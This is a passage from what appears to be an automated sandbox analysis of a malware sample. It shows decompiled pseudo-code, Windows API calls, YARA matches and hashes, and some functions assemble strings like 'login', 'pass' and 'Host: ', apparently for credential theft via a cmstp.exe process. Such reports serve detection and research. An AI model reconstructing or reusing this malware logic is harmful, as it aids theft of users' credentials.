				_t30 = __ecx ^ __ebx;
				if(_t30 >= 0) {
					L5:
					_t6 = _t36 + _t30 - 0x73;
					 *_t6 =  *(_t36 + _t30 - 0x73) << 0x4d;
					__eflags =  *_t6;
				} else {
					asm("out dx, eax");
					_t36 = __esi | 0x0000000c;
					asm("bound edx, [ebp-0x75]");
					_push(_t37);
					_t37 = _t40;
					_t30 = _a12;
					_v4 =  &_v532;
					_t26 = E0041C640( &_v8, 0x104, _t30);
					_t45 = _t40 - 0x214 + 0xc;
					if(_t26 != 0) {
						E0041CA60(__eflags, _v8);
						_t40 = _t45 + 4;
						goto L5;
					} else {
						return _t26;
					}
				}
			}












                                                      0x0040acb6
                                                      0x0040acb7
                                                      0x0040acb9
                                                      0x0040acfa
                                                      0x0040acfc
                                                      0x0040acfc
                                                      0x0040acfc
                                                      0x0040acbb
                                                      0x0040acbb
                                                      0x0040acbc
                                                      0x0040acbf
                                                      0x0040acc0
                                                      0x0040acc1
                                                      0x0040acc9
                                                      0x0040acdc
                                                      0x0040acdf
                                                      0x0040ace4
                                                      0x0040ace9
                                                      0x0040acf3
                                                      0x0040acf8
                                                      0x00000000
                                                      0x0040aceb
                                                      0x0040acee
                                                      0x0040acee
                                                      0x0040ace9

                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 696913467e76d2c84a39e11bc9897da2965d2c0e90361cbb7cf834e2009c8b1b
                                                      • Instruction ID: 68c248138143724ed67b850961b7edf75b99cd6a2853cc23bbfdaaff3e23f1a0
                                                      • Opcode Fuzzy Hash: 696913467e76d2c84a39e11bc9897da2965d2c0e90361cbb7cf834e2009c8b1b
                                                      • Instruction Fuzzy Hash: 9101D8B2E40209ABDF10DBA0DC82FDDB7759B54308F0081AEE90CA7140F5349A54C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A23D, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: e60e70facbeccc5a54e6722dd0fb2bc32bdb3e4e47ac64c8a4090f44e0e1f81b
                                                      • Instruction ID: 8db42e43153aa1695e577f075af4966aeee9fd547e1e833dac266f4e754d92d4
                                                      • Opcode Fuzzy Hash: e60e70facbeccc5a54e6722dd0fb2bc32bdb3e4e47ac64c8a4090f44e0e1f81b
                                                      • Instruction Fuzzy Hash: 9AF05EB5211204AFCB10EF99DC85CE777A8EF84324F01895AFD5C97703C634E9648BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A052, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 64%
                                                      			E0041A052(void* __eax, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t16;
				void* _t22;

				asm("in al, 0x8b");
				_push(0x19e1fdd6);
				_t13 = _v0;
				_t7 = _t13 + 0xc74; // 0xc74
				E0041A950(_t22, _v0, _t7,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t16 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t16;
			}






                                                      0x0041a052
                                                      0x0041a060
                                                      0x0041a063
                                                      0x0041a06f
                                                      0x0041a077
                                                      0x0041a08d
                                                      0x0041a091

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 29b3fa8da009d5cd162ea3390509b8ed455c4ab19ddd87714156fcde965c6f9e
                                                      • Instruction ID: e0fe26d7004ab95c6c4622e39b6d2277444ee98d61314ebf0f4be56855432f24
                                                      • Opcode Fuzzy Hash: 29b3fa8da009d5cd162ea3390509b8ed455c4ab19ddd87714156fcde965c6f9e
                                                      • Instruction Fuzzy Hash: E3E06DB1210208ABD718DF59CC45EE73768EF48350F014659FD1857342C630E9108AE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                      0x0041a06f
                                                      0x0041a077
                                                      0x0041a08d
                                                      0x0041a091

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00417D5A, Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 51%
                                                      			E00417D5A(void* __eax, void* __ebx, void* __edx) {
				signed int _t13;
				void* _t17;
				void* _t21;
				void* _t24;
				void* _t27;

				asm("insd");
				asm("in al, 0xeb");
				_push(_t24);
				 *((short*)(_t27 - 0x14)) = 0x20;
				 *((intOrPtr*)(_t27 - 0x20)) = 0x69676f6c;
				 *((short*)(_t27 - 0x1c)) = 0x206e;
				if(E0041C030(_t17) == 0) {
					_t4 = _t27 - 0x10; // 0x73736170
					_t18 = _t4;
					if(E0041C030(_t4, _t21, _t4, _t24) != 0) {
						goto L2;
					} else {
						_t5 = _t27 - 0x18; // 0x68747561
						if(E0041C030(_t18, _t21, _t5, _t24) != 0) {
							goto L2;
						} else {
							_t6 = _t27 - 0x20; // 0x69676f6c
							_t13 = E0041C030(_t18, _t21, _t6, _t24);
							asm("sbb eax, eax");
							return  ~( ~_t13);
						}
					}
				} else {
					L2:
					return 1;
				}
			}








                                                      0x00417d61
                                                      0x00417d62
                                                      0x00417d64
                                                      0x00417dbb
                                                      0x00417dc1
                                                      0x00417dc8
                                                      0x00417dd8
                                                      0x00417de6
                                                      0x00417de6
                                                      0x00417df5
                                                      0x00000000
                                                      0x00417df7
                                                      0x00417df8
                                                      0x00417e07
                                                      0x00000000
                                                      0x00417e09
                                                      0x00417e0a
                                                      0x00417e0f
                                                      0x00417e19
                                                      0x00417e22
                                                      0x00417e22
                                                      0x00417e07
                                                      0x00417dda
                                                      0x00417dda
                                                      0x00417de4
                                                      0x00417de4

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e2475ecca74ea6008cd36c3a4ebc8597f46ec1d0ffa2bbd484d6c3f4dc03cbf
                                                      • Instruction ID: ca43c65f0f0d65ba3840e094ad4d3191a540b9002434a382c8b4b18b8a2c4410
                                                      • Opcode Fuzzy Hash: 5e2475ecca74ea6008cd36c3a4ebc8597f46ec1d0ffa2bbd484d6c3f4dc03cbf
                                                      • Instruction Fuzzy Hash: 6EC01202E461E0155B26051524A44B5FFF8844F053B18AAEAC488B70114407840683A9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00416C8E, Relevance: .0, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 51%
                                                      			E00416C8E(void* __eax, void* __ebx, signed int __edx, void* __esi) {
				intOrPtr* _t34;
				void* _t49;
				char* _t60;
				void* _t63;
				void* _t65;
				void* _t67;
				void* _t73;

				_t49 = __ebx;
				asm("in al, dx");
				asm("sbb [ebx-0x75], dl");
				_pop(_t65);
				 *(__esi + 0x57) =  *(__esi + 0x57) | __edx;
				_t3 = _t49 + 0xd68; // 0x139ec32d
				_t34 =  *((intOrPtr*)(__ebx + 0xcc0));
				 *_t34 =  *_t34 + _t34;
				_t5 = _t49 + 0x9c44; // 0x139f5209
				_t60 = _t5;
				 *((intOrPtr*)(_t65 - 0x18)) = 0x6e6b6e55;
				 *((intOrPtr*)(_t65 - 0x14)) = 0x6e776f;
				_push( *_t34(_t3, 0x100));
				_t63 =  *((intOrPtr*)( *((intOrPtr*)(__ebx + 0xcb8))))();
				if(_t63 != 0) {
					if(_t63 > 0x40) {
						 *((char*)(__ebx + 0xda7)) = 0;
						_t63 = 0x40;
					}
				} else {
					_t9 = _t65 - 0x18; // 0x6e6b6e55
					_t10 = _t49 + 0xd68; // 0x139ec32d
					E0041B7D0(_t10, _t9, 8);
					_t67 = _t67 + 0xc;
					_t63 = 7;
				}
				_t12 = _t65 - 0x10; // -483000134
				 *((intOrPtr*)(_t65 - 8)) = 0xa0d0a0d;
				 *((char*)(_t65 - 4)) = 0;
				 *((intOrPtr*)(_t65 - 0x10)) = 0x74736f48;
				 *((short*)(_t65 - 0xc)) = 0x203a;
				 *((char*)(_t65 - 0xa)) = 0;
				E0041B7D0(_t60, _t12, 7);
				_t18 = _t49 + 0xd68; // 0x139ec32d
				_t19 = _t60 + 6; // 0x139f520f
				E0041B7D0(_t19, _t18, _t63);
				_t20 = _t65 - 8; // 0xa0d0a0d
				 *((char*)(_t63 + _t60 + 6)) = 0;
				E0041BBD0(_t60, _t20, 5);
				_t23 = _t65 + 0x10; // 0x74736f48
				_t24 = _t65 + 0xc; // 0x203a
				_t26 = _t60 + 0xa; // 0x11
				E0041B7D0(_t63 + _t26,  *_t24,  *_t23);
				_t28 = _t65 + 0x10; // 0x74736f48
				_t54 =  *_t28;
				_push( *((intOrPtr*)(_t49 + 0x1174)));
				_push(2);
				_t30 = _t54 + 0xa; // 0x11
				_push(_t63 + _t30);
				_push(_t60);
				_push(_t49);
				L004163B0( *((intOrPtr*)(_t49 + 0x1174)), _t49,  *_t28, _t63 + _t30, _t60, _t63, _t73);
				return 1;
			}










                                                      0x00416c8e
                                                      0x00416cb4
                                                      0x00416cb5
                                                      0x00416cb8
                                                      0x00416cb9
                                                      0x00416cbc
                                                      0x00416cc8
                                                      0x00416ccc
                                                      0x00416cce
                                                      0x00416cce
                                                      0x00416cd4
                                                      0x00416cdb
                                                      0x00416cea
                                                      0x00416ced
                                                      0x00416cf1
                                                      0x00416d12
                                                      0x00416d14
                                                      0x00416d1b
                                                      0x00416d1b
                                                      0x00416cf3
                                                      0x00416cf5
                                                      0x00416cf9
                                                      0x00416d00
                                                      0x00416d05
                                                      0x00416d08
                                                      0x00416d08
                                                      0x00416d22
                                                      0x00416d27
                                                      0x00416d2e
                                                      0x00416d32
                                                      0x00416d39
                                                      0x00416d3f
                                                      0x00416d43
                                                      0x00416d49
                                                      0x00416d50
                                                      0x00416d54
                                                      0x00416d5b
                                                      0x00416d60
                                                      0x00416d65
                                                      0x00416d6a
                                                      0x00416d6d
                                                      0x00416d72
                                                      0x00416d77
                                                      0x00416d82
                                                      0x00416d82
                                                      0x00416d85
                                                      0x00416d86
                                                      0x00416d88
                                                      0x00416d8c
                                                      0x00416d8d
                                                      0x00416d8e
                                                      0x00416d8f
                                                      0x00416da2

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cc5dcb5d5bb466bd8a4ed79d7514a70b49eeb5a5a71711c5a9f5654f74857bc5
                                                      • Instruction ID: e12070ca5660f3f01f1d069cc054efc42ad668dc6d1add0e092e27f524bd21fc
                                                      • Opcode Fuzzy Hash: cc5dcb5d5bb466bd8a4ed79d7514a70b49eeb5a5a71711c5a9f5654f74857bc5
                                                      • Instruction Fuzzy Hash: F8B09223FBA83A04A4254C9C7C411B4E3AA808B02DA1433B3D899F7142A883C01A42DA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Analysis Process: cmstp.exe PID: 5300 Parent PID: 3292 cmstp.exeCOMMON

                                                      Executed Functions

                                                      Function 00859D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00854B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00854B77,007A002E,00000000,00000060,00000000,00000000), ref: 00859D9D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: .z`
                                                      • API String ID: 823142352-1441809116
                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction ID: 8d78c1d294b476e88c861c05365b8c2599696b0cafe3fd6e3e712a8830168861
                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction Fuzzy Hash: 74F0BDB2200208AFCB08CF88DC95EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00859E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(00854D32,5EB6522D,FFFFFFFF,008549F1,?,?,00854D32,?,008549F1,FFFFFFFF,5EB6522D,00854D32,?,00000000), ref: 00859E45
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction ID: 2c130890b3a69197cf51f3b7f5a05ea88724059ca00b77ccbff392b2f15416d8
                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction Fuzzy Hash: B0F0A4B2200208AFCB18DF89DC91EEB77ADEF8C754F158248BE1D97241D630E8118BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00859F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00842D11,00002000,00003000,00000004), ref: 00859F69
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction ID: 228ed7c9f1c2a22002553ace568eaa44a76d1e87cd0a9e34a1ca42badf2d9d12
                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction Fuzzy Hash: 18F015B2200218AFCB18DF89CC81EAB77ADEF8C750F118248BE1897241C630F810CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00859E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(00854D10,?,?,00854D10,00000000,FFFFFFFF), ref: 00859EA5
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction ID: d4f8770dea3d95bfd4aba8c26ff9f09dae298974d451ac6702150f74dee7bad3
                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction Fuzzy Hash: 5CD01776200214ABD714EB98CC86EA77BACEF48761F154599BA6C9B242C530FA0086E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04949840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f92aedc884deb203393d2c3a1bef354cbf76a765376c4a5506ae7045f90a8d15
                                                      • Instruction ID: 0b592ebaa32ecd996efdb12b340020ae97f2b2b4f35bc77e1b3316eaea11facc
                                                      • Opcode Fuzzy Hash: f92aedc884deb203393d2c3a1bef354cbf76a765376c4a5506ae7045f90a8d15
                                                      • Instruction Fuzzy Hash: 72900261242141537546F15984045074056E7E02857A1C122A5405951C8566E896E761
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04949860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9c137e32171303a661ea0113f3c99b139025e865634e5edf9b52149bb49c7b14
                                                      • Instruction ID: f3852293a892711c24f47c4f21a0fd6891de9983a8a261295fa5910268262069
                                                      • Opcode Fuzzy Hash: 9c137e32171303a661ea0113f3c99b139025e865634e5edf9b52149bb49c7b14
                                                      • Instruction Fuzzy Hash: 8190027120110413F112A15985047070059D7D0285FA1C522A4415559D9696D992B261
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 123e6e2610a35ffd341247ff7c4db67e3bd035993c7b11ae3861d20dc64166c9
                                                      • Instruction ID: cdf24cf172266a349a897aaa16731bf540c8a1cd373ce5c9e03f1a15f8775c56
                                                      • Opcode Fuzzy Hash: 123e6e2610a35ffd341247ff7c4db67e3bd035993c7b11ae3861d20dc64166c9
                                                      • Instruction Fuzzy Hash: 259002A134110443F101A1598414B060055D7E1345F61C125E5055555D8659DC927266
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 443ee4ab5265b710b2cbdac2e5578b6f99271512b89a62dd46542b68b5b38f1a
                                                      • Instruction ID: ad985d7ec074aff7f6f95c97514cc87659f208d5a8052c9a9a2aaa4048048580
                                                      • Opcode Fuzzy Hash: 443ee4ab5265b710b2cbdac2e5578b6f99271512b89a62dd46542b68b5b38f1a
                                                      • Instruction Fuzzy Hash: C69002A1202100036106B1598414616405AD7E0245B61C131E5005591DC565D8D17265
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04949910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c0174bba570a21cfb926b6dc4fcc97aff31e33f78c16b74876eb8457ab81f7cb
                                                      • Instruction ID: 51c1c2c80f079b5a4eb33599d0eea781437d4d23fb3f24968c7d26255cdab597
                                                      • Opcode Fuzzy Hash: c0174bba570a21cfb926b6dc4fcc97aff31e33f78c16b74876eb8457ab81f7cb
                                                      • Instruction Fuzzy Hash: 2F9002B120110403F141B15984047460055D7D0345F61C121A9055555E8699DDD577A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04949540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7e8ab1b0f125b9a8c0bc580017313e6cf042c6f5ecd2970cba45f9546ed84f13
                                                      • Instruction ID: 08206ddabb80e2a15f03583f89ee6cbd36d6a181945b0da869421095617b4791
                                                      • Opcode Fuzzy Hash: 7e8ab1b0f125b9a8c0bc580017313e6cf042c6f5ecd2970cba45f9546ed84f13
                                                      • Instruction Fuzzy Hash: 9F900265211100032106E55947045070096D7D5395361C131F5006551CD661D8A16261
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049496D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7b2ac1870162b4af706d5286d4818bf81c11b1178d0ea60c12eed28ac6441f3d
                                                      • Instruction ID: 251824873494dc26601b12a0950dbbbfa1b0f9e96fff353050aebf6eddcd187a
                                                      • Opcode Fuzzy Hash: 7b2ac1870162b4af706d5286d4818bf81c11b1178d0ea60c12eed28ac6441f3d
                                                      • Instruction Fuzzy Hash: 2F90027120110843F101A1598404B460055D7E0345F61C126A4115655D8655D8917661
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 571c4cce36f1d2fe264bc5f122d1b44997803d61b143a79a5e8a361b174ccf89
                                                      • Instruction ID: bdc84eb22028c0b31cc4170baec6d571df5189836c7a331529c3b36e0cdaa3b4
                                                      • Opcode Fuzzy Hash: 571c4cce36f1d2fe264bc5f122d1b44997803d61b143a79a5e8a361b174ccf89
                                                      • Instruction Fuzzy Hash: B790027120118803F111A159C40474A0055D7D0345F65C521A8415659D86D5D8D17261
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04949A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5638398a595694bdc8944b00ac629a7ba9f49cffdb6387d80a93eb188f4a9967
                                                      • Instruction ID: 849d81a2087d660230ca965395df71413cb6d9abf70c33de06207afcba5e3560
